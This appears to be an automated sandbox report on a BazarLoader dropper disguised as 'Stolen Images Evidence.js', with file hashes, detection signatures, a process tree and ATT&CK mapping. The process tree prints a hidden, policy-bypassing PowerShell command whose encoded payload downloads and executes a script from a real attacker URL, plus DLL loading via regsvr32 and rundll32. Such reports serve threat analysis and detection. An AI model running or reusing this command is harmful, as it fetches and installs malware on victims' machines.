bazarloader | a3d502012d1cded2d5a936372a08073db9b85dd2323908f9d55d802c24e8aa20

General

Target

Stolen Images Evidence.js
Size

19KB
MD5

c62b322046bee6a5a86c4fecf5dee72e
SHA1

18a381be8472fcee623c18cb1bfcf938682bef7d
SHA256

edb86c44b69eb1071a138ec2fd99968a18d671ecbcc6cbd7babcde7a132c1e01
SHA512

2d19000408a61cbf744defb51fc8f0c64f11c74186cdc2f56317641e16fd7c794919ead08ce119c62ec966dcd5a2c62794845e53f4697e657394c9e90ac1f0dc

Score

10^/10

bazarloader dropper loader

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://bobersok.top/333g100/index.php

Signatures

Bazar Loader
Detected loader normally used to deploy BazarBackdoor malware.
loader dropper bazarloader

Bazar/Team9 Loader payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2888-141-0x0000000000720000-0x0000000000748000-memory.dmp	BazarLoaderVar6
behavioral2/memory/3472-145-0x00000185898F0000-0x0000018589918000-memory.dmp	BazarLoaderVar6

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

13 1432 powershell.exe
Loads dropped DLL 2 IoCs

Processes:

regsvr32.exerundll32.exe

pid process

2888 regsvr32.exe
3472 rundll32.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

1432 powershell.exe
1432 powershell.exe
1432 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1432 powershell.exe

flow	pid	process
13	1432	powershell.exe

pid	process
2888	regsvr32.exe
3472	rundll32.exe

pid	process
1432	powershell.exe
1432	powershell.exe
1432	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1432	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

wscript.execmd.exepowershell.exe

description	pid	process	target process
PID 1816 wrote to memory of 4044	1816	wscript.exe	cmd.exe
PID 1816 wrote to memory of 4044	1816	wscript.exe	cmd.exe
PID 4044 wrote to memory of 1432	4044	cmd.exe	powershell.exe
PID 4044 wrote to memory of 1432	4044	cmd.exe	powershell.exe
PID 1432 wrote to memory of 2888	1432	powershell.exe	regsvr32.exe
PID 1432 wrote to memory of 2888	1432	powershell.exe	regsvr32.exe

C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\Stolen Images Evidence.js"
1⤵
- Suspicious use of WriteProcessMemory
PID:1816

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c POwersheLL -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYgBvAGIAZQByAHMAbwBrAC4AdABvAHAALwAzADMAMwBnADEAMAAwAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
2⤵
- Suspicious use of WriteProcessMemory
PID:4044

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
POwersheLL -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYgBvAGIAZQByAHMAbwBrAC4AdABvAHAALwAzADMAMwBnADEAMAAwAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1432

C:\Windows\System32\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" C:\Users\Admin\AppData\Local\Temp\ZrQOBam.dat
4⤵
- Loads dropped DLL
PID:2888

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Users\Admin\AppData\Local\Temp\ZrQOBam.dat,DllRegisterServer {0E26A7BA-3829-46D1-83AC-21349F83EC06}
1⤵
- Loads dropped DLL
PID:3472

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\ZrQOBam.dat
MD5
370c9d108da11f3b4896043bf82f1cce

SHA1
8b767892c3cb9005d55dee809ecfcb17376a84e4

SHA256
a303b6a1d5f1e3ba8e44d60b7f550168246785baf455fe4831181ca23601a926

SHA512
70906520231807a233b85057071fdf4d64935b984d49e4b5a6f14ab73719c4acfc40d5cf6a2deda02a2f44e2a3e8969b8140520a302de6ec72f4a23ef8f3fca0

Download Submit
\Users\Admin\AppData\Local\Temp\ZrQOBam.dat
MD5
370c9d108da11f3b4896043bf82f1cce

SHA1
8b767892c3cb9005d55dee809ecfcb17376a84e4

SHA256
a303b6a1d5f1e3ba8e44d60b7f550168246785baf455fe4831181ca23601a926

SHA512
70906520231807a233b85057071fdf4d64935b984d49e4b5a6f14ab73719c4acfc40d5cf6a2deda02a2f44e2a3e8969b8140520a302de6ec72f4a23ef8f3fca0

Download Submit
\Users\Admin\AppData\Local\Temp\ZrQOBam.dat
MD5
370c9d108da11f3b4896043bf82f1cce

SHA1
8b767892c3cb9005d55dee809ecfcb17376a84e4

SHA256
a303b6a1d5f1e3ba8e44d60b7f550168246785baf455fe4831181ca23601a926

SHA512
70906520231807a233b85057071fdf4d64935b984d49e4b5a6f14ab73719c4acfc40d5cf6a2deda02a2f44e2a3e8969b8140520a302de6ec72f4a23ef8f3fca0

Download Submit
memory/1432-122-0x000002A527050000-0x000002A527051000-memory.dmp

Filesize
4KB

Download
memory/1432-132-0x000002A525200000-0x000002A525202000-memory.dmp

Filesize
8KB

Download
memory/1432-120-0x000002A525060000-0x000002A525062000-memory.dmp

Filesize
8KB

Download
memory/1432-116-0x0000000000000000-mapping.dmp

Download
memory/1432-121-0x000002A525060000-0x000002A525062000-memory.dmp

Filesize
8KB

Download
memory/1432-123-0x000002A525060000-0x000002A525062000-memory.dmp

Filesize
8KB

Download
memory/1432-125-0x000002A525060000-0x000002A525062000-memory.dmp

Filesize
8KB

Download
memory/1432-126-0x000002A525060000-0x000002A525062000-memory.dmp

Filesize
8KB

Download
memory/1432-127-0x000002A53FAD0000-0x000002A53FAD1000-memory.dmp

Filesize
4KB

Download
memory/1432-128-0x000002A525060000-0x000002A525062000-memory.dmp

Filesize
8KB

Download
memory/1432-133-0x000002A525203000-0x000002A525205000-memory.dmp

Filesize
8KB

Download
memory/1432-119-0x000002A525060000-0x000002A525062000-memory.dmp

Filesize
8KB

Download
memory/1432-138-0x000002A525206000-0x000002A525208000-memory.dmp

Filesize
8KB

Download
memory/1432-135-0x000002A525060000-0x000002A525062000-memory.dmp

Filesize
8KB

Download
memory/1432-118-0x000002A525060000-0x000002A525062000-memory.dmp

Filesize
8KB

Download
memory/1432-117-0x000002A525060000-0x000002A525062000-memory.dmp

Filesize
8KB

Download
memory/2888-134-0x0000000000000000-mapping.dmp

Download
memory/2888-140-0x0000000000750000-0x0000000000752000-memory.dmp

Filesize
8KB

Download
memory/2888-139-0x0000000000750000-0x0000000000752000-memory.dmp

Filesize
8KB

Download
memory/2888-141-0x0000000000720000-0x0000000000748000-memory.dmp

Filesize
160KB

Download
memory/3472-144-0x0000018588120000-0x0000018588122000-memory.dmp

Filesize
8KB

Download
memory/3472-143-0x0000018588120000-0x0000018588122000-memory.dmp

Filesize
8KB

Download
memory/3472-145-0x00000185898F0000-0x0000018589918000-memory.dmp

Filesize
160KB

Download
memory/4044-115-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing